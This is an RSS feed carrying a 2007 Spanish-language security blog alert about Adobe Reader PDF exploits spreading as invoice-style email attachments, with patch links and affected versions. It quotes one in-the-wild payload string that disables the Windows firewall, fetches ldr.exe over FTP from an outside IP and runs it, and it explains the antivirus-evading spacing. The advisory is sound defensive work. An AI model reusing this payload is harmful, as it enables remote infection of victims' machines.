<?xml version="1.0" encoding="ISO-8859-15"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sergio Hernando &#187; Adobe+Reader Adobe+Vulnerabilities</title>
	<atom:link href="http://www.sahw.com/wp/archivos/tag/adobereader-adobevulnerabilities/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sahw.com/wp</link>
	<description>Seguridad de la Información y Auditoría de Sistemas</description>
	<lastBuildDate>Sun, 05 Sep 2010 21:10:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Alerta: Vulnerabilidades en productos Adobe (Exploits PDF in the wild)</title>
		<link>http://www.sahw.com/wp/archivos/2007/10/24/alerta-vulnerabilidades-en-productos-adobe-exploits-pdf-on-the-wild/</link>
		<comments>http://www.sahw.com/wp/archivos/2007/10/24/alerta-vulnerabilidades-en-productos-adobe-exploits-pdf-on-the-wild/#comments</comments>
		<pubDate>Wed, 24 Oct 2007 20:07:38 +0000</pubDate>
		<dc:creator>Sergio Hernando</dc:creator>
				<category><![CDATA[Alertas]]></category>
		<category><![CDATA[Adobe+Reader Adobe+Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.sahw.com/wp/archivos/2007/10/24/alerta-vulnerabilidades-en-productos-adobe-exploits-pdf-on-the-wild/</guid>
		<description><![CDATA[Buenas, Pese a que es un tema nada reciente y solucionado por el fabricante hace un par de días, parece que empieza a haber una cantidad ingente de exploits in the wild circulando, y la gente que no se ha enterado no ha actualizado. Así pues, me váis a permitir que emita la alerta. Especialmente [...]]]></description>
			<content:encoded><![CDATA[<p>Buenas,</p>
<p>Pese a que es un tema nada reciente y <a href="http://www.adobe.com/support/security/bulletins/apsb07-18.html">solucionado por el fabricante</a> hace un par de días, parece que empieza a haber una cantidad ingente de <em>exploits in the wild</em> circulando, y la gente que no se ha enterado no ha actualizado. Así pues, me váis a permitir que emita la alerta.</p>
<p>Especialmente peligroso es que estos falsos documentos PDF se están enviando como adjuntos al correo pueden provocar familiaridad entre los receptores. El formato PDF siempre ha gozado de una falsa apariencia de seguridad entre los usuarios, ya que pese a ser un formato seguro, no siempre son seguros los clientes que permiten visualizar documentos portables. Los usuarios suelen confiar en PDF, asumiendo que nada malo les puede pasar.</p>
<p>Estos exploits están llegando a los buzones como adjuntos "BILL.pdf" y "INVOICE.pdf", aunque es  factible que estos nombres se vayan permutando. El formato del exploit viene a ser parecido al siguiente:</p>
<p><code>obj< </URI(mailto :%/../../../../ ../../Windows /system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI></code></p>
<p>En este ejemplo podemos comprobar que la carga maliciosa provoca la desactivación del firewall de Windows (netsh firewall set opmode mode=disable), la recogida de un FTP malicioso del fichero ldr.exe (get /ldr.exe) y su ejecución (start ldr.exe). Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso. Una vez instalado el fichero, no queda ahí la cosa: ldr.exe, o cualquiera que sea el ejecutable malicioso instalado aprovechando la vulnerabilidad descrita, será con toda probabilidad un <em>huevo kinder</em> con su correspondiente regalito: un troyano para robar credenciales, un control remoto para integrar la máquina en un botnet ... cualquier combinación es posible.</p>
<p>Para evitar problemas, actualizad <a href="http://www.adobe.com/support/security/bulletins/apsb07-18.html">siguiendo las recomendaciones de Adobe</a> y no perdáis de vista <a href="https://isc.sans.org/diary.html?storyid=3531">lo que recomienda SANS</a>. Os proporciono dos enlaces:</p>
<blockquote><p><a href="http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows">Parche para Acrobat</a><br />
<a href="http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows">Parche para Acrobat Reader</a></p></blockquote>
<p>Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.</p>
<p>Los usuarios de Windows pueden recurrir a lectores PDF alternativos, y que por tanto, por menor grado de exposición, suelen protagonizar menos incidentes de seguridad. <a href="http://www.foxitsoftware.com/pdf/rd_intro.php">Una opción muy recomendable es Foxit Reader</a>. Si lo que quieréis es una aplicación libre para generar PDF, podéis emplear las <a href="http://pages.cs.wisc.edu/~ghost/">herramientas Ghostscript</a>.</p>
<p><strong>NOTA IMPORTANTE:</strong> Sólo los usuarios de Windows XP con Internet Explorer 7 están afectados por la vulnerabilidad descrita. </p>
<p>Un saludo, </p>
]]></content:encoded>
			<wfw:commentRss>http://www.sahw.com/wp/archivos/2007/10/24/alerta-vulnerabilidades-en-productos-adobe-exploits-pdf-on-the-wild/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
